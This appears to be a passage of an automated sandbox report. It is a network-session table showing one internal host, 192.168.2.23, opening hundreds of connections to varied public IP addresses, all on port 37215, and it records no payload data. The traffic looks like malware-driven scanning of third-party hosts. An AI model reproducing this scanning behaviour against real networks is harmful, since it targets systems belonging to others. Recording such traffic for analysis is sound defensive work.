                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12204192.168.2.2356752180.160.169.21837215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12205192.168.2.2339822157.197.232.12537215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12206192.168.2.2343948206.211.48.25437215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12207192.168.2.2336674157.225.48.12637215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12208192.168.2.2333342217.4.9.2037215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12209192.168.2.2357644197.70.26.12437215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12210192.168.2.2353198197.93.247.4037215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12211192.168.2.2335144197.193.193.937215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12212192.168.2.235312241.144.168.21037215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12213192.168.2.2352496157.82.21.10237215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12214192.168.2.2359422157.202.61.10137215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12215192.168.2.2353124140.189.133.25237215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12216192.168.2.235748441.151.2.4637215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12217192.168.2.2333384157.100.200.24537215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12218192.168.2.233982041.139.25.21937215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12219192.168.2.234224083.145.187.15637215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12220192.168.2.2346008197.96.90.21937215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12221192.168.2.2334414115.211.197.4037215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12222192.168.2.2341258197.117.116.11237215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12223192.168.2.233623041.97.191.5837215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12224192.168.2.235694095.235.165.7237215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12225192.168.2.2355940199.208.11.3837215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12226192.168.2.2356618197.84.35.3537215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12227192.168.2.233577241.226.104.17637215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12228192.168.2.2349176157.9.181.5737215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12229192.168.2.2338374197.48.232.23437215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12230192.168.2.2345940157.211.138.2437215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12231192.168.2.2347980197.242.22.9737215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12232192.168.2.233878441.2.112.21137215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12233192.168.2.2357828157.91.104.24637215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12234192.168.2.233638240.222.6.14437215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12235192.168.2.235840241.200.207.21937215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12236192.168.2.235936636.253.101.25037215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12237192.168.2.2355384157.144.92.16337215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12238192.168.2.2344368157.79.241.12237215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12239192.168.2.236078241.95.202.4737215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12240192.168.2.2359476190.173.21.10937215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12241192.168.2.2345484197.39.50.20137215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12242192.168.2.2343466157.238.75.10737215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12243192.168.2.2338476174.40.209.5237215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12244192.168.2.2358360157.21.168.23837215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12245192.168.2.233673841.164.28.7137215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12246192.168.2.235251841.132.74.22537215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12247192.168.2.2333238157.204.66.24937215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12248192.168.2.235095841.162.246.10537215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12249192.168.2.234385641.244.48.4037215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12250192.168.2.2338936157.54.219.6137215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12251192.168.2.235298660.52.41.1237215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12252192.168.2.234274441.96.251.12537215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12253192.168.2.2358034157.163.135.4737215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12254192.168.2.235524817.139.4.22637215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12255192.168.2.2352644157.164.178.23437215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12256192.168.2.234799852.247.95.20237215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12257192.168.2.2354490197.138.222.22837215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12258192.168.2.2349366197.169.255.15437215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12259192.168.2.235515841.86.157.2037215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12260192.168.2.2357080157.190.85.9237215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12261192.168.2.2359954197.69.113.1437215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12262192.168.2.235317241.3.191.12937215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12263192.168.2.233810041.28.145.237215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12264192.168.2.235374241.42.33.13837215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12265192.168.2.2336726157.165.241.13637215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12266192.168.2.233774462.161.136.7637215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12267192.168.2.2346302197.73.69.637215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12268192.168.2.234266641.136.92.23337215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12269192.168.2.234060474.163.174.8937215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12270192.168.2.2359616167.152.130.8037215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12271192.168.2.234552441.115.106.8237215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12272192.168.2.2359698197.118.202.1237215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12273192.168.2.234653464.123.70.24037215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12274192.168.2.2347736160.198.140.11937215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12275192.168.2.2343934157.1.207.15137215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12276192.168.2.2333814114.166.4.21537215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12277192.168.2.2359500197.175.12.2337215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12278192.168.2.2358110148.23.30.18237215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12279192.168.2.233792645.34.203.10937215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12280192.168.2.2333514157.245.247.23737215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12281192.168.2.2346128157.52.207.12737215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12282192.168.2.2339550157.117.109.11337215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12283192.168.2.2343224157.45.1.19537215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12284192.168.2.234779686.216.61.19137215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12285192.168.2.2336872157.236.20.25437215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12286192.168.2.2360572157.84.170.10337215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12287192.168.2.2353092103.147.42.15537215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12288192.168.2.2336650157.161.180.16137215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12289192.168.2.2334470197.201.150.11637215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12290192.168.2.2358026197.155.177.13137215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12291192.168.2.2334558197.239.3.4137215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12292192.168.2.235229241.130.170.16937215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12293192.168.2.2360862197.110.224.11537215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12294192.168.2.2351064197.48.113.23337215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12295192.168.2.2347258157.185.145.2337215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12296192.168.2.2350816197.224.75.11337215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12297192.168.2.2345010197.118.114.1837215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12298192.168.2.2343126197.86.2.13837215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12299192.168.2.233403241.40.83.037215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12300192.168.2.235101441.241.154.937215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12301192.168.2.2351910157.127.181.15437215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12302192.168.2.2351004147.252.117.23037215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12303192.168.2.2337354197.9.138.1837215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12304192.168.2.2339938197.131.17.18337215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12305192.168.2.236076417.31.61.23837215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12306192.168.2.2351376157.172.19.1037215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12307192.168.2.2349594197.94.204.13537215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12308192.168.2.2338920157.44.109.23237215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12309192.168.2.2339020197.58.85.25337215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12310192.168.2.235661241.119.77.12537215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12311192.168.2.233494841.113.194.20137215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12312192.168.2.2337908197.51.177.9837215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12313192.168.2.2339392157.110.184.20537215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12314192.168.2.2349072197.10.46.20537215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12315192.168.2.235018641.120.198.23837215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12316192.168.2.2335514179.221.230.14437215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12317192.168.2.2341452157.76.184.10737215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12318192.168.2.2349478197.0.252.11437215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12319192.168.2.2360442157.203.162.13337215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12320192.168.2.234858641.49.66.24337215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12321192.168.2.2347174197.65.172.23537215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12322192.168.2.235324441.178.83.637215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12323192.168.2.2346880197.34.1.1037215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12324192.168.2.2352386197.190.236.20337215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12325192.168.2.2336064157.151.209.10537215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12326192.168.2.2346486157.87.48.10637215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12327192.168.2.2342832157.152.247.6937215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12328192.168.2.233435641.9.205.17837215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12329192.168.2.234265041.69.121.4837215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12330192.168.2.2335058197.100.58.5737215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12331192.168.2.2334464157.83.110.537215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12332192.168.2.2333414157.241.26.20037215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12333192.168.2.234745041.14.67.937215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12334192.168.2.233969239.50.139.1737215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12335192.168.2.2350944197.131.208.6537215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12336192.168.2.233587281.152.30.16537215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12337192.168.2.2340220157.62.236.437215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12338192.168.2.235891447.129.25.4037215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12339192.168.2.2348518197.46.149.22937215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12340192.168.2.2357938137.169.227.24037215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12341192.168.2.23357148.141.187.13237215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12342192.168.2.2355430157.153.138.9237215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12343192.168.2.2356228197.201.200.24737215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12344192.168.2.2351848197.197.29.8137215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12345192.168.2.2334432197.58.16.10037215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12346192.168.2.2358852197.93.182.17937215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12347192.168.2.235523841.117.124.7237215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12348192.168.2.2352536157.104.240.20937215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12349192.168.2.235538441.213.24.8437215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12350192.168.2.235667618.228.97.23737215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12351192.168.2.234724241.159.148.19437215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12352192.168.2.2356056157.43.142.19637215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12353192.168.2.2358226157.207.37.21137215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12354192.168.2.2357790157.54.185.13637215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12355192.168.2.2345486157.46.150.16537215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12356192.168.2.2356290197.206.223.5537215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12357192.168.2.235181043.26.240.22137215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12358192.168.2.233965441.240.46.4537215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12359192.168.2.2352448157.157.6.137215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12360192.168.2.235150067.213.88.17837215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12361192.168.2.2359958197.72.175.15137215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12362192.168.2.2339286119.78.223.19237215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12363192.168.2.2343440197.122.97.11637215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12364192.168.2.2353850197.26.225.237215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12365192.168.2.2346772197.219.214.2537215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12366192.168.2.2352890197.191.186.17537215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12367192.168.2.2358696197.192.136.10237215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12368192.168.2.2342464197.85.138.1237215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12369192.168.2.2358924157.113.200.2437215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12370192.168.2.2335826157.49.145.8137215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12371192.168.2.235706441.18.108.8937215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12372192.168.2.2359310148.107.160.19437215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12373192.168.2.2346510197.178.146.16537215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12374192.168.2.235977841.175.59.20637215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12375192.168.2.234451817.21.195.24637215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12376192.168.2.235307641.18.200.17937215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12377192.168.2.233802641.129.31.19737215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12378192.168.2.2343642197.189.76.22337215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12379192.168.2.234654061.96.108.23837215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12380192.168.2.234146041.82.198.23737215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12381192.168.2.2355030119.47.228.16237215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12382192.168.2.2334086199.123.38.4637215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12383192.168.2.2346712157.190.200.23737215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12384192.168.2.2346618208.10.189.21337215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12385192.168.2.233899241.175.107.8337215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12386192.168.2.2344554157.1.44.10937215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12387192.168.2.234638841.68.37.21237215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12388192.168.2.2344336157.160.206.25437215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12389192.168.2.2344326148.75.7.15437215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12390192.168.2.233730841.151.201.20637215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12391192.168.2.2334852157.108.245.14537215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12392192.168.2.234900041.120.7.24437215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12393192.168.2.235873641.198.66.4837215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12394192.168.2.2333628197.152.128.21737215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12395192.168.2.2356576169.6.10.24137215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12396192.168.2.2342124157.140.44.21737215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12397192.168.2.234449017.28.55.10737215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12398192.168.2.233829062.14.216.15337215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12399192.168.2.234695878.249.100.21337215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12400192.168.2.2339764157.155.251.14837215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12401192.168.2.2348080157.91.202.20537215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12402192.168.2.2337478157.170.90.737215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12403192.168.2.2356370199.120.90.11337215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12404192.168.2.236015650.43.81.25437215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12405192.168.2.2348676197.154.6.5637215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12406192.168.2.2338228157.107.236.17437215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12407192.168.2.2353018157.242.88.12937215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12408192.168.2.2358494157.99.151.7937215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12409192.168.2.2343886187.187.167.14837215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12410192.168.2.2333504157.44.207.8237215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12411192.168.2.2350106157.128.112.22037215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12412192.168.2.234939441.161.204.13137215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12413192.168.2.2352514157.224.58.1937215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12414192.168.2.234228641.51.106.13337215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12415192.168.2.2340258197.172.211.7637215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12416192.168.2.2336168157.192.133.2737215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12417192.168.2.2344368131.221.220.22937215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12418192.168.2.2333634197.97.25.20937215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12419192.168.2.2341756197.177.99.4137215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12420192.168.2.233996241.21.80.2237215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12421192.168.2.2357480122.110.182.6637215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
